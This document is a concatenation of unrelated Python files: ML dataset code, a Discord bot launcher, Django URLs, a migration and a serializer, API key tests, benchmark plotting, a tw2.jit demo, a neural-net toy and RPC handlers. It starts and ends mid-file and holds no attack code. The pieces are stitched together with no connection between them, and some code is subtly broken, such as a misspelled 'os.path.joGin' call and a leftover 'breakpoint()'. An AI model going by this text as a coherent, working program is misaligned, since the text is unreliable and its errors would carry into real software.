self.features = self.data.loc[:, self.data.columns.values[:-1]]
self.labels = self.data.loc[:, self.data.columns.values[-1]]
# Map rock (R) to 0 and mine (M) to 1
self.labels[self.labels == 'M'] = 1
self.labels[self.labels == 'R'] = 0
def get_validation_indices(self, train_ratio, val_ratio):
""" Separates data into training, validation and test and normalizes
the columns by using z-scores """
train, val, test = split_data(self.features.shape[0],
train_ratio,
val_ratio)
# Store normalization info
self.feature_norm = self._normalize_features(train, val)
return train, val, test
def _normalize_features(self, train_idx, val_idx):
training = np.concatenate([train_idx, val_idx])
mean_c, std_c, min_c, max_c = \
feature_normalize(self.features.iloc[training, :])
self.features = (self.features - mean_c) / std_c
# Store normalization info
return {'mean': mean_c, 'std': std_c, 'min': min_c, 'max_c': max_c}
def get_options(self):
options = {'feature_normalization': self.feature_norm}
return options
def define_columns(self):
cols = []
# Columns
for i in range(self.features.shape[1]):
current_col = NumericColumn(
name=str(i), type=map_feature_type(np.dtype('float'))
)
cols.append(current_col)
# Label
cols.append(NumericColumn(
name='class', type=map_feature_type(np.dtype('int'))
))
return cols
def build_examples(self, index):
row = self.features.iloc[index, :]
feature_dict = {}
for i in range(self.features.shape[1]):
feature_dict.update(
{str(i): float64_feature(row.iloc[i])}
)
class_value = int(self.labels.iloc[index])
feature_dict.update({'class': int64_feature(class_value)})
return [tf.train.Example(features=tf.train.Features(feature=feature_dict))] # noqa
class SonarSettings(DataSettings):
def __init__(self, dataset_location, image_specs=None,
embedding_dimensions=32, quantizer=None):
super(SonarSettings, self).__init__(
dataset_location=dataset_location,
image_specs=image_specs,
embedding_dimensions=embedding_dimensions,
quantizer=quantizer)
def tag(self):
return 'sonar'
def size_per_instance(self):
return 0.5
def target_class(self):
return 'class'
def _target_type(self):
return tf.int32
def _get_num_classes(self):
return 2
def select_wide_cols(self):
return [v.to_column() for k, v in self.columns.items()]
def select_deep_cols(self):
return RuntimeError('No embeddings in this dataset')
def is_downloaded(folder):
""" Returns whether data has been downloaded """
return os.path.isfile(get_data_path(folder))
def get_data_path(folder):
return os.path.join(folder, DATA_FILE_NAME)
| python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""argparse and main entry point script"""
import argparse
import logging
import os
import sys
from logging.handlers import TimedRotatingFileHandler
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
import kootkounter.bot
LOG_LEVEL_STRINGS = ["CRITICAL", "ERROR", "WARNING", "INFO", "DEBUG"]
def log_level(log_level_string: str):
"""Argparse type function for determining the specified logging level"""
if log_level_string not in LOG_LEVEL_STRINGS:
raise argparse.ArgumentTypeError(
"invalid choice: {} (choose from {})".format(
log_level_string,
LOG_LEVEL_STRINGS
)
)
return getattr(logging, log_level_string, logging.INFO)
def add_log_parser(parser):
"""Add logging options to the argument parser"""
group = parser.add_argument_group(title="Logging")
group.add_argument("--log-level", dest="log_level", default="INFO",
type=log_level, help="Set the logging output level")
group.add_argument("--log-dir", dest="log_dir",
help="Enable TimeRotatingLogging at the directory "
"specified")
group.add_argument("-v", "--verbose", action="store_true",
help="Enable verbose logging")
def init_logging(args, log_file_path):
"""Intake a argparse.parse_args() object and setup python logging"""
# configure logging
handlers_ = []
log_format = logging.Formatter(fmt="[%(asctime)s] [%(levelname)s] - %(message)s")
if args.log_dir:
os.makedirs(args.log_dir, exist_ok=True)
file_handler = TimedRotatingFileHandler(
os.path.join(args.log_dir, log_file_path),
when="d", interval=1, backupCount=7, encoding="UTF-8",
)
file_handler.setFormatter(log_format)
file_handler.setLevel(args.log_level)
handlers_.append(file_handler)
if args.verbose:
stream_handler = logging.StreamHandler(stream=sys.stderr)
stream_handler.setFormatter(log_format)
stream_handler.setLevel(args.log_level)
handlers_.append(stream_handler)
logging.basicConfig(
handlers=handlers_,
level=args.log_level
)
def get_parser() -> argparse.ArgumentParser:
"""Create and return the argparse"""
parser = argparse.ArgumentParser(
description="Start the kootkounter Discord bot",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument("-tf", "--token-file", dest="token_file",
required=True,
help="Path to file containing the Discord token for "
"the bot")
parser.add_argument("-d", "--database", dest="database",
default="degeneracy.db",
help="Path to the SQLITE database to store state")
add_log_parser(parser)
return parser
def main() -> int:
"""main entry point"""
parser = get_parser()
args = parser.parse_args()
init_logging(args, "koolkounter.log")
with open(args.token_file, "r") as f:
token = f.read().strip()
engine = create_engine('sqlite:///{}'.format(args.database))
kootkounter.bot.BASE.metadata.create_all(engine)
kootkounter.bot.DB = sessionmaker(bind=engine)()
kootkounter.bot.BOT.run(token)
return 0
if __name__ == "__main__":
sys.exit(main())
| python |
import sys
from pathlib import Path
# Path modifications
paths = ["../build/src", "../src/preproc", "../src/util"]
for item in paths:
addPath = Path(__file__).parent / item
sys.path.append(str(addPath.resolve()))
#-----------------------------------------------------------------------------#
import util_yaml
yamlDict = util_yaml.load(sys.argv[1])
yamlDict = util_yaml.process(yamlDict)
breakpoint() | python |
import os
import yaml
def root():
mydir = os.path.dirname(os.path.realpath(__file__))
return os.path.dirname(mydir)
def tla_result_fixture(zone_number, score=0):
return {
'score': score,
'present': True,
'disqualified': False,
'zone': zone_number,
}
def get_data(data_root, input_name):
input_file = os.path.join(root(), data_root, input_name)
output_file = os.path.join(root(), data_root, input_name[:-5] + '.out.yaml')
if not os.path.exists(output_file):
raise ValueError(
"Missing output expectation '{1}' for input '{0}'.".format(
input_name,
output_file,
),
)
with open(output_file) as f:
expected_output = yaml.load(f)
return input_file, expected_output
def get_input_files(data_root):
files = os.listdir(os.path.join(root(), data_root))
outputs = [f for f in files if f.endswith('.out.yaml')]
inputs = [f for f in files if f.endswith('.yaml') and f not in outputs]
return inputs
| python |
from django.urls import include, path, re_path
from . import handlers
article_urlpatterns = [
path("2020/", handlers.handler_2020, name="articles-2020"),
path(
"categories/",
include(
[
path("<str:category>", handlers.category, name="categories"),
path(
"<str:category>/newest/", handlers.newest, name="newest-in-category"
),
]
),
),
path("<int:year>/", handlers.year_handler, name="articles-year"),
path("<int:year>/<int:month>/", handlers.month_handler, name="articles-year-month"),
path("<int:year>/popular/", handlers.month_handler, name="articles-year-month"),
path(
"<int:year>/<int:month>/<int:day>/",
handlers.popular_articles,
name="popular-articles",
),
]
user_urlpatterns = [path("extra/", handlers.home_handler, name="users-extra")]
urlpatterns = [
path("", handlers.home_handler, name="home"),
path(
"articles/",
include(article_urlpatterns),
),
path("users/", include(user_urlpatterns)),
re_path("^[a-z]*$", handlers.catchall, name="catchall"),
path("int/<int:id>", handlers.home_handler, name="int"),
]
| python |
import base64
import os
from io import BytesIO
from PIL import Image
from rest_framework import serializers
from photologue.models import Photo, Gallery
from oms_cms.config import settings
from django.conf import settings
BASE_DIR = settings.BASE_DIR
class ImageSerializerField(serializers.Field):
def to_representation(self, value):
outputPath = self.to_internal_value(value)
return outputPath
def to_internal_value(self, value):
f = value.split("/").pop().split(".").pop(1)
if f == "jpeg" or f == "jpg" or f == "webp":
way = "tmp/img{}.j2p".format(value.split("/").pop().split(".").pop(0))
outputPath = os.path.joGin(settings.MEDIA_ROOT, way)
# quality = 50
try:
Image.open(settings.MEDIA_ROOT + "/" + way)
except:
im = Image.open(BASE_DIR + value[value.rfind('/media'):])
im.save(outputPath, 'JPEG', optimize=True, quality=60)
path = settings.MEDIA_URL[:settings.MEDIA_URL.find('media')] + outputPath[outputPath.rfind('media'):]
return path
else:
return value
class PhotoSerializer(serializers.ModelSerializer):
"""Photo"""
# image = serializers.ImageField(max_length=None, use_url=True, allow_null=True, required=False)
# image = serializers.ImageField('image.url')
# image = serializers.SerializerMethodField('get_thumbnail_url')
image = serializers.URLField(read_only=True, source='image.url')
image_alt = ImageSerializerField(read_only=True, source='image.url')
# def get_thumbnail_url(self, obj):
# return '%s%s' % (settings.MEDIA_URL, obj.get_absolute_url)
class Meta:
model = Photo
fields = ("id", "image", "image_alt")
class GallerySerializer(serializers.ModelSerializer):
"""Photo"""
photos = PhotoSerializer(many=True, read_only=True)
class Meta:
model = Gallery
fields = ("id", "title", "description", "photos", 'slug')
| python |
# vim: set expandtab shiftwidth=4 :
# pylint: disable=missing-docstring
import json
import requests
from . import base
from . import settings
class KeysSymmTest(base.BaseTest):
user = settings.EXISTING_USERS[1]
wrong_user = settings.EXISTING_USERS[2]
def make_put_body(self):
return {
'loginKey': self.user['loginKey'],
'privateDataKey': self.user['privateDataKey'],
}
def get_symm_keys(self, auth=None):
if auth is None:
auth = self.auth_good()
return requests.get(
self.url_prefix(self.user) + '/keys/symm',
headers={'content-type': 'application/json'},
**auth)
def put_symm_keys(self, body, auth=None):
if auth is None:
auth = self.auth_good()
return requests.put(
self.url_prefix(self.user) + '/keys/symm',
headers={'content-type': 'application/json'},
data=json.dumps(body),
**auth)
def test_get_bad_auth(self):
resp = self.get_symm_keys(self.auth_wrong_user())
self.assertEqual(resp.status_code, requests.codes.unauthorized)
resp = self.get_symm_keys(self.auth_nonexisting_user())
self.assertEqual(resp.status_code, requests.codes.unauthorized)
resp = self.get_symm_keys(self.auth_bad_login_key())
self.assertEqual(resp.status_code, requests.codes.unauthorized)
def test_get_success(self):
resp = self.get_symm_keys()
self.assertEqual(resp.status_code, requests.codes.ok)
resp_body = json.loads(resp.text)
self.assertFalse(resp_body.has_key('loginKey'))
self.assertTrue(resp_body.has_key('privateDataKey'))
self.assertEqual(resp_body['privateDataKey'], self.user['privateDataKey'])
def test_put_bad_login_key_format(self):
# missing loginKey
body = self.make_put_body()
del body['loginKey']
resp = self.put_symm_keys(body)
self.assertEqual(resp.status_code, requests.codes.bad_request)
# loginKey too short
body = self.make_put_body()
body['loginKey'] = body['loginKey'][:-1]
resp = self.put_symm_keys(body)
self.assertEqual(resp.status_code, requests.codes.bad_request)
# loginKey too long
body = self.make_put_body()
body['loginKey'] += '0'
resp = self.put_symm_keys(body)
self.assertEqual(resp.status_code, requests.codes.bad_request)
# bad char
body = self.make_put_body()
body['loginKey'] = body['loginKey'][:-1] + 'x'
resp = self.put_symm_keys(body)
self.assertEqual(resp.status_code, requests.codes.bad_request)
# wrong case
body = self.make_put_body()
body['loginKey'] = body['loginKey'][:-1] + 'A'
resp = self.put_symm_keys(body)
self.assertEqual(resp.status_code, requests.codes.bad_request)
def test_put_bad_private_data_key_format(self):
# missing privateDataKey
body = self.make_put_body()
del body['privateDataKey']
resp = self.put_symm_keys(body)
self.assertEqual(resp.status_code, requests.codes.bad_request)
# privateDataKey too short
body = self.make_put_body()
body['privateDataKey'] = "A" * 43
resp = self.put_symm_keys(body)
self.assertEqual(resp.status_code, requests.codes.bad_request)
# privateDataKey too long
body = self.make_put_body()
body['privateDataKey'] = "A" * 201
resp = self.put_symm_keys(body)
self.assertEqual(resp.status_code, requests.codes.bad_request)
# bad char
body = self.make_put_body()
body['privateDataKey'] = body['privateDataKey'][:-1] + '%'
resp = self.put_symm_keys(body)
self.assertEqual(resp.status_code, requests.codes.bad_request)
def test_put_success(self):
original_auth = self.auth_good()
original_login_key = self.user['loginKey']
original_private_data_key = self.user['privateDataKey']
# switch to new loginKey
self.user['loginKey'] = "fedcba9876543210" * 8
self.user['privateDataKey'] = "asdf" * 20
body = self.make_put_body()
resp = self.put_symm_keys(body, original_auth)
self.assertEqual(resp.status_code, requests.codes.ok)
# check changed privateDataKey
self.test_get_success()
# switch back to old loginKey
new_auth = self.auth_good()
self.user['loginKey'] = original_login_key
self.user['privateDataKey'] = original_private_data_key
body = self.make_put_body()
resp = self.put_symm_keys(body, new_auth)
self.assertEqual(resp.status_code, requests.codes.ok)
# check original privateDataKey
self.test_get_success()
| python |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
"""Generate ERT vs param. figures.
The figures will show the performance in terms of ERT on a log scale
w.r.t. parameter. On the y-axis, data is represented as
a number of function evaluations. Crosses (+) give the median number of
function evaluations for the smallest reached target function value
(also divided by dimension). Crosses (×) give the average number of
overall conducted function evaluations in case the smallest target
function value (1e-8) was not reached.
"""
from __future__ import absolute_import
import os
import matplotlib.pyplot as plt
import numpy as np
from . import toolsstats, testbedsettings, genericsettings, toolsdivers
from .ppfig import save_figure, getFontSize
__all__ = ['beautify', 'plot', 'read_fun_infos', 'main']
avgstyle = dict(color='r', marker='x', markersize=20)
medmarker = dict(linestyle='', marker='+', markersize=30, markeredgewidth=5,
zorder=-1)
colors = ('k', 'b', 'c', 'g', 'y', 'm', 'r', 'k', 'k', 'c', 'r', 'm') # sort of rainbow style
styles = [{'color': 'k', 'marker': 'o', 'markeredgecolor': 'k'},
{'color': 'b'},
{'color': 'c', 'marker': 'v', 'markeredgecolor': 'c'},
{'color': 'g'},
{'color': 'y', 'marker': '^', 'markeredgecolor': 'y'},
{'color': 'm'},
{'color': 'r', 'marker': 's', 'markeredgecolor': 'r'}] # sort of rainbow style
refcolor = 'wheat'
# should correspond with the colors in pprldistr.
# Get benchmark short infos, prepended with the function id.
def read_fun_infos():
funInfos = {}
for id in testbedsettings.current_testbed.short_names:
funInfos[int(id)] = str(id) + ' ' + testbedsettings.current_testbed.short_names[id]
return funInfos
def beautify():
"""Customize figure presentation."""
# Input checking
# Get axis handle and set scale for each axis
axisHandle = plt.gca()
axisHandle.set_xscale("log")
axisHandle.set_yscale("log")
# Grid options
axisHandle.grid(True)
ymin, ymax = plt.ylim()
xmin, xmax = plt.xlim()
# quadratic and cubic "grid"
#plt.plot((2,200), (1, 1e2), 'k:')
#plt.plot((2,200), (1, 1e4), 'k:')
#plt.plot((2,200), (1e3, 1e5), 'k:')
#plt.plot((2,200), (1e3, 1e7), 'k:')
#plt.plot((2,200), (1e6, 1e8), 'k:')
#plt.plot((2,200), (1e6, 1e10), 'k:')
# axes limits
plt.ylim(10**-0.2, ymax) # Set back the previous maximum.
# ticks on axes
# axisHandle.invert_xaxis()
# plt.xlim(1.8, 45) # TODO should become input arg?
# dimticklist = (2, 3, 4, 5, 10, 20, 40) # TODO: should become input arg at some point?
# dimannlist = (2, 3, '', 5, 10, 20, 40) # TODO: should become input arg at some point?
# TODO: All these should depend on one given input (xlim, ylim)
# axisHandle.set_xticks(dimticklist)
# axisHandle.set_xticklabels([str(n) for n in dimannlist])
tmp = axisHandle.get_yticks()
tmp2 = []
for i in tmp:
tmp2.append('%d' % round(np.log10(i)))
axisHandle.set_yticklabels(tmp2)
plt.ylabel('Run Lengths')
def plot(dsList, param='dim', targets=(10., 1., 1e-1, 1e-2, 1e-3, 1e-5, 1e-8)):
"""Generate plot of ERT vs param."""
dictparam = dsList.dictByParam(param)
params = sorted(dictparam) # sorted because we draw lines
# generate plot from dsList
res = []
# collect data
rawdata = {}
for p in params:
assert len(dictparam[p]) == 1
rawdata[p] = dictparam[p][0].detEvals(targets)
# expect dictparam[p] to have only one element
# plot lines for ERT
xpltdata = params
for i, t in enumerate(targets):
ypltdata = []
for p in params:
data = rawdata[p][i]
unsucc = np.isnan(data)
assert len(dictparam[p]) == 1
data[unsucc] = dictparam[p][0].maxevals
# compute ERT
ert, srate, succ = toolsstats.sp(data, issuccessful=(unsucc == False))
ypltdata.append(ert)
res.extend(plt.plot(xpltdata, ypltdata, markersize=20,
zorder=len(targets) - i, **styles[i]))
# for the legend
plt.plot([], [], markersize=10,
label=' %+d' % (np.log10(targets[i])),
**styles[i])
# plot median of successful runs for hardest target with a success
for p in params:
for i, t in enumerate(reversed(targets)): # targets has to be from hardest to easiest
data = rawdata[p][i]
data = data[np.isnan(data) == False]
if len(data) > 0:
median = toolsstats.prctile(data, 50.)[0]
res.extend(plt.plot(p, median, styles[i]['color'], **medmarker))
break
# plot average number of function evaluations for the hardest target
xpltdata = []
ypltdata = []
for p in params:
data = rawdata[p][0] # first target
xpltdata.append(p)
if (np.isnan(data) == False).all():
tmpdata = data.copy()
assert len(dictparam[p]) == 1
tmpdata[np.isnan(data)] = dictparam[p][0].maxevals[np.isnan(data)]
tmp = np.mean(tmpdata)
else:
tmp = np.nan # Check what happens when plotting NaN
ypltdata.append(tmp)
res.extend(plt.plot(xpltdata, ypltdata, **avgstyle))
# display numbers of successes for hardest target where there is still one success
for p in params:
for i, t in enumerate(targets): # targets has to be from hardest to easiest
data = rawdata[p][i]
unsucc = np.isnan(data)
assert len(dictparam[p]) == 1
data[unsucc] = dictparam[p][0].maxevals
# compute ERT
ert, srate, succ = toolsstats.sp(data, issuccessful=(unsucc == False))
if srate == 1.:
break
elif succ > 0:
res.append(plt.text(p, ert * 1.85, "%d" % succ, axes=plt.gca(),
horizontalalignment="center",
verticalalignment="bottom"))
break
return res
def main(dsList, _targets=(10., 1., 1e-1, 1e-2, 1e-3, 1e-5, 1e-8),
param=('dim', 'Dimension'), is_normalized=True, outputdir='.'):
"""Generates figure of ERT vs. param.
This script will generate as many figures as there are functions.
For a given function and a given parameter value there should be
only **one** data set.
Crosses (+) give the median number of function evaluations of
successful trials for the smallest reached target function value.
Crosses (x) give the average number of overall conducted function
evaluations in case the smallest target function value (1e-8) was
not reached.
:keyword DataSetList dsList: data sets
:keyword seq _targets: target precisions
:keyword tuple param: parameter on x-axis. The first element has to
be a string corresponding to the name of an
attribute common to elements of dsList. The
second element has to be a string which will
be used as label for the figures. The values
of attribute param have to be sortable.
:keyword bool is_normalized: if True the y values are normalized by
x values
:keyword string outputdir: name of output directory for the image
files
"""
funInfos = read_fun_infos()
# TODO check input parameter param
for func, dictfunc in dsList.dictByFunc().items():
filename = os.path.join(outputdir,'ppfigparam_%s_f%03d' % (param[0], func))
try:
targets = list(j[func] for j in _targets)
except TypeError:
targets = _targets
targets = sorted(targets) # from hard to easy
handles = plot(dictfunc, param[0], targets)
# # display best algorithm
# if not bestalg.bestAlgorithmEntries:
# bestalg.load_reference_algorithm()
# bestalgdata = []
# for d in dimsBBOB:
# entry = bestalg.bestAlgorithmEntries[(d, func)]
# tmp = entry.detERT([1e-8])[0]
# if not np.isinf(tmp):
# bestalgdata.append(tmp/d)
# else:
# bestalgdata.append(None)
# plt.plot(dimsBBOB, bestalgdata, color=refcolor, linewidth=10, zorder=-2)
# plt.plot(dimsBBOB, bestalgdata, ls='', marker='d', markersize=25,
# color=refcolor, markeredgecolor=refcolor, zorder=-2)
a = plt.gca()
if is_normalized:
for i in handles:
try:
plt.setp(i, 'ydata', plt.getp(i, 'ydata') / plt.getp(i, 'xdata'))
except TypeError:
pass
a.relim()
a.autoscale_view()
beautify()
plt.xlabel(param[1])
if is_normalized:
plt.setp(plt.gca(), 'ylabel', plt.getp(a, 'ylabel') + ' / ' + param[1])
if func in testbedsettings.current_testbed.functions_with_legend:
toolsdivers.legend(loc="best")
fontSize = getFontSize(funInfos.values())
if func in funInfos.keys():
a.set_title(funInfos[func], fontsize=fontSize)
save_figure(filename, dsList[0].algId)
plt.close()
| python |
# Generated by Django 2.1.5 on 2019-02-18 12:48
from django.db import migrations, models
def change_negative_fields(apps, schema_editor):
Resource = apps.get_model('resources', 'Resource')
for resource in Resource.objects.all():
resource_has_changed = False
if resource.area and resource.area < 0:
resource.area = 0
resource_has_changed = True
if resource.max_reservations_per_user and resource.max_reservations_per_user < 0:
resource.max_reservations_per_user = 0
resource_has_changed = True
if resource.people_capacity and resource.people_capacity < 0:
resource.people_capacity = 0
resource_has_changed = True
if resource_has_changed:
resource.save()
class Migration(migrations.Migration):
dependencies = [
('resources', '0074_reservation_confirmed_notification_extra_translations'),
]
operations = [
migrations.RunPython(change_negative_fields),
migrations.AlterField(
model_name='resource',
name='area',
field=models.PositiveIntegerField(blank=True, null=True, verbose_name='Area (m2)'),
),
migrations.AlterField(
model_name='resource',
name='max_reservations_per_user',
field=models.PositiveIntegerField(blank=True, null=True, verbose_name='Maximum number of active reservations per user'),
),
migrations.AlterField(
model_name='resource',
name='people_capacity',
field=models.PositiveIntegerField(blank=True, null=True, verbose_name='People capacity'),
),
]
| python |
""" Samples of how to use tw2.jit
Each class exposed in the widgets submodule has an accompanying Demo<class>
widget here with some parameters filled out.
The demos implemented here are what is displayed in the tw2.devtools
WidgetBrowser.
"""
from tw2.core.resources import JSSymbol
from tw2.jit.widgets import SQLARadialGraph
import transaction
from sqlalchemy import (
Column, Integer, Unicode,
MetaData, Table, ForeignKey,
)
from sqlalchemy.orm import relation, backref
from sqlalchemy.ext.declarative import declarative_base
import tw2.sqla as tws
session = tws.transactional_session()
Base = declarative_base(metadata=MetaData('sqlite:///%s.db' % __name__))
Base.query = session.query_property()
friends_mapping = Table(
'persons_friends_mapping', Base.metadata,
Column('friender_id', Integer,
ForeignKey('persons.id'), primary_key=True),
Column('friendee_id', Integer,
ForeignKey('persons.id'), primary_key=True))
class Person(Base):
__tablename__ = 'persons'
id = Column(Integer, primary_key=True)
first_name = Column(Unicode(255), nullable=False)
last_name = Column(Unicode(255), nullable=False)
some_attribute = Column(Unicode(255), nullable=False)
def __unicode__(self):
return "<img src='%s' /> %s %s" % (
self.gravatar_url(8), self.first_name, self.last_name)
@property
def email(self):
return "%s.%[email protected]" % (self.first_name, self.last_name)
def gravatar_url(self, size=64):
# import code for encoding urls and generating md5 hashes
import urllib
try:
from hashlib import md5
except ImportError:
import md5
md5 = md5.new
# construct the url
gravatar_url = "http://www.gravatar.com/avatar.php?"
gravatar_url += urllib.urlencode({
'gravatar_id': md5(self.email.lower()).hexdigest(),
'size': size, 'd': 'monsterid',
})
return gravatar_url
def __jit_data__(self):
dictator = "This person is not a dictator."
if self.last_name in ["Ben Ali", "Mubarak", "Qaddafi"]:
dictator = "Probably needs to be overthrown."
return {
# This attribute is used to generate hoverover tips
"hover_html" : """
<div>
<h3>person.__jit_data__()['hover_html']</h3>
<img src="%s" />
<p>%s %s with %i friends and %i pets.</p>
<p>%s</p>
</div>
""" % (self.gravatar_url(), self.first_name, self.last_name,
len(self.friends), len(self.pets), dictator),
# This attribute is ultimately just ignored but by
# specifying it here, it is made available clientside
# for any custom js you want to rig up.
"some_attr" : self.some_attribute,
"traversal_costs" : {
# You can set this to 2 to change the way depth
# accumulates during the generation of a json response.
'friends' : 1
}
}
class Pet(Base):
__tablename__ = 'pets'
id = Column(Integer, primary_key=True)
name = Column(Unicode(255), nullable=False)
variety = Column(Unicode(255), nullable=False)
owner_id = Column(Integer, ForeignKey('persons.id'))
owner = relation(
Person, primaryjoin=owner_id==Person.id,
backref=backref('pets'))
def __unicode__(self):
return "%s the %s" % (self.name, self.variety)
def __jit_data__(self):
# TODO -- in the future, let's add other attributes
# like 'click' or some js callbacks
return {
"hover_html" : """
<div>
<h3>pet.__jit_data__()['hover_html']</h3>
<p>This content is specified in the sqlalchemy model.
If you didn't know. This is a Pet object.
It is a %s that goes by the name %s.</p>
<p>You might want to
<a href="http://www.google.com/search?q=%s">
google for its name
</a>, or something.</p>
</div>""" % (self.variety, self.name, self.name),
"traversal_costs" : {
'owner' : 2,
}
}
Person.__mapper__.add_property('friends', relation(
Person,
primaryjoin=Person.id==friends_mapping.c.friendee_id,
secondaryjoin=friends_mapping.c.friender_id==Person.id,
secondary=friends_mapping,
doc="List of this persons' friends!",
))
Base.metadata.create_all()
def populateDB(sess):
if Person.query.count() > 0:
print "Not populating DB. Already stuff in there."
return
import random
firsts = ["Sally", "Suzie", "Sandy",
"John", "Jim", "Joseph"]
lasts = ["Anderson", "Flanderson", "Johnson",
"Frompson", "Qaddafi", "Mubarak", "Ben Ali"]
for first in firsts:
for last in lasts:
p = Person(
first_name=first, last_name=last,
some_attribute="Fun fact #%i" % random.randint(0,255)
)
sess.add(p)
pet_names = ["Spot", "Mack", "Cracker", "Fluffy", "Alabaster",
"Slim Pickins", "Lil' bit", "Balthazaar", "Hadoop"]
varieties = ["dog", "cat", "bird", "fish", "hermit crab", "lizard"]
for person in Person.query.all():
for i in range(random.randint(0,7)):
pet = Pet(name=pet_names[random.randint(0,len(pet_names)-1)],
variety=varieties[random.randint(0,len(varieties)-1)])
sess.add(pet)
person.pets.append(pet)
qaddafis = Person.query.filter_by(last_name='Qaddafi').all()
mubaraks = Person.query.filter_by(last_name='Mubarak').all()
benalis = Person.query.filter_by(last_name='Ben Ali').all()
dictators = qaddafis + mubaraks + benalis
print "populating dictators friends"
for p1 in dictators:
for p2 in dictators:
if p1 == p2 or p1 in p2.friends:
continue
if random.random() > 0.75:
p1.friends.append(p2)
p2.friends.append(p1)
print "populating everyone else's friends"
for p1 in Person.query.all():
for p2 in Person.query.all():
if p1 == p2 or p1 in p2.friends:
continue
if random.random() > 0.95:
p1.friends.append(p2)
p2.friends.append(p1)
print "done populating DB"
populateDB(session)
transaction.commit()
class DemoSQLARadialGraph(SQLARadialGraph):
entities = [Person, Pet]
excluded_columns = ['id', 'owner_id']
# Some initial target
rootObject = Person.query.first()
base_url = '/db_radialgraph_demo/'
background = { 'CanvasStyles':{ 'strokeStyle' : '#C73B0B' } }
backgroundcolor = '#350608'
Node = {
'color' : '#C73B0B',
}
Edge = {
'color': '#F2C545',
'lineWidth':1.5,
}
import tw2.core as twc
mw = twc.core.request_local()['middleware']
mw.controllers.register(DemoSQLARadialGraph, 'db_radialgraph_demo')
| python |
import numpy as np
from matplotlib import pyplot as plt
from neural_network import NeuralNet
def generate_data():
N = 100 # number of points per class
D = 2 # dimensionality
K = 3 # number of classes
X = np.zeros((N * K, D))
y = np.zeros(N * K, dtype='uint8') # class labels
for j in range(K):
ix = range(N * j, N * (j + 1))
r = np.linspace(0.0, 1, N) # radius
t = np.linspace(j * 4, (j + 1) * 4, N) + np.random.randn(N) * 0.2 # theta
X[ix] = np.c_[r * np.sin(t), r * np.cos(t)]
y[ix] = j
return X, y
def list_to_num(list):
"""sums the numbers in a list based on indices - useful for switching from categories
indicated by lists with entries in {0,1} to change the 1 in the ith entry into the number i"""
result = 0
for index, number in enumerate(list):
result += index * number
return result
@np.vectorize
def num_to_list_padded(integer, padding):
"""changes a number to a list with added padding"""
result = [0 for _ in range(padding)]
small_form = num_to_list(integer)
result[0:len(small_form)] = small_form
return result
@np.vectorize
def num_to_list(integer):
"""changes a number to a list - a quasi inverse of the list_to_num"""
result = [0 for _ in range(3)]
result[integer] = 1
return result
def initialize_new():
"""Initializes a new example neural net with one hidden layer."""
result = NeuralNet(2)
result.add_relu(100)
result.add_relu(3)
result.add_softmax()
result.add_cross_entropy_loss()
return result
def visualise(X, y):
"""plot a data set given X - coordinates and y - labels."""
plt.scatter(X[:, 0], X[:, 1], c=y, s=40, cmap=plt.cm.Spectral)
plt.show()
def train_ex(net, data, iters, learning_rate, initial_iteration=0):
"""Takes a neural network and trains it on the data given using gradient descent.
Learning rate decay is built in"""
for i in range(iters):
_learning_rate = learning_rate / (1 + i + initial_iteration)
if i % 100 == 99:
print(f'iteration: {i}')
print(f'learning rate: {_learning_rate}')
print(f'loss: {net.loss}')
for s in data:
net.forward_pass(s[0], s[1])
net.back_prop(s[1], learning_rate=_learning_rate)
def visualise_boundary(net, granularity):
"""visualise all the points in a grid by plotting which class would be predicted"""
granularity = granularity
x = np.linspace(-1.5, 1.5, granularity)
y = np.linspace(-1.5, 1.5, granularity)
xv, yv = np.meshgrid(x, y)
z = np.zeros((granularity, granularity))
for i in range(granularity):
for j in range(granularity):
z[i, j] = list_to_num(
np.round(net.forward_pass(np.array([[xv[i, j]], [yv[i, j]]]), y.transpose())))
plt.scatter(xv, yv, c=z, s=40, cmap=plt.cm.Spectral)
plt.show()
| python |
def rev(string):
reverse_string = ''
for c in range(len(string)-1, -1, -1):
reverse_string += string[c]
return reverse_string
| python |
from typing import Any, Iterable, Iterator, Mapping, Optional, Tuple, TypedDict, Union
from eth_enr import ENRAPI
from eth_enr.abc import ENRManagerAPI
from eth_enr.typing import ENR_KV
from eth_typing import HexStr
from eth_utils import (
encode_hex,
is_hex,
is_integer,
is_text,
to_bytes,
to_dict,
to_tuple,
)
from ddht.abc import RoutingTableAPI, RPCHandlerAPI, RPCRequest
from ddht.rpc import RPCError, RPCHandler
from ddht.v5_1.rpc_handlers import extract_params
class BucketInfo(TypedDict):
idx: int
nodes: Tuple[HexStr, ...]
replacement_cache: Tuple[HexStr, ...]
is_full: bool
class TableInfoResponse(TypedDict):
center_node_id: HexStr
num_buckets: int
bucket_size: int
buckets: Mapping[int, BucketInfo]
class RoutingTableInfoHandler(RPCHandler[None, TableInfoResponse]):
def __init__(self, routing_table: RoutingTableAPI) -> None:
self._routing_table = routing_table
def extract_params(self, request: RPCRequest) -> None:
if request.get("params"):
raise RPCError(f"Unexpected RPC params: {request['params']}",)
return None
async def do_call(self, params: None) -> TableInfoResponse:
stats = TableInfoResponse(
center_node_id=encode_hex(self._routing_table.center_node_id),
num_buckets=len(self._routing_table.buckets),
bucket_size=self._routing_table.bucket_size,
buckets=self._bucket_stats(),
)
return stats
@to_dict
def _bucket_stats(self) -> Iterator[Tuple[int, BucketInfo]]:
buckets_and_replacement_caches = zip(
self._routing_table.buckets, self._routing_table.replacement_caches,
)
for idx, (bucket, replacement_cache) in enumerate(
buckets_and_replacement_caches, start=1
):
if bucket:
yield (
idx,
BucketInfo(
idx=idx,
nodes=tuple(encode_hex(node_id) for node_id in bucket),
replacement_cache=tuple(
encode_hex(node_id) for node_id in replacement_cache
),
is_full=(len(bucket) >= self._routing_table.bucket_size),
),
)
class NodeInfoResponse(TypedDict):
node_id: HexStr
enr: str
class NodeInfoHandler(RPCHandler[None, NodeInfoResponse]):
_node_id_hex: HexStr
def __init__(self, enr: ENRAPI) -> None:
self._enr = enr
def extract_params(self, request: RPCRequest) -> None:
if request.get("params"):
raise RPCError(f"Unexpected RPC params: {request['params']}")
return None
async def do_call(self, params: None) -> NodeInfoResponse:
return NodeInfoResponse(
node_id=encode_hex(self._enr.node_id), enr=repr(self._enr),
)
@to_tuple
def normalize_and_validate_kv_pairs(
params: Any,
) -> Iterable[Tuple[bytes, Optional[bytes]]]:
if not params:
raise RPCError("Missing parameters.")
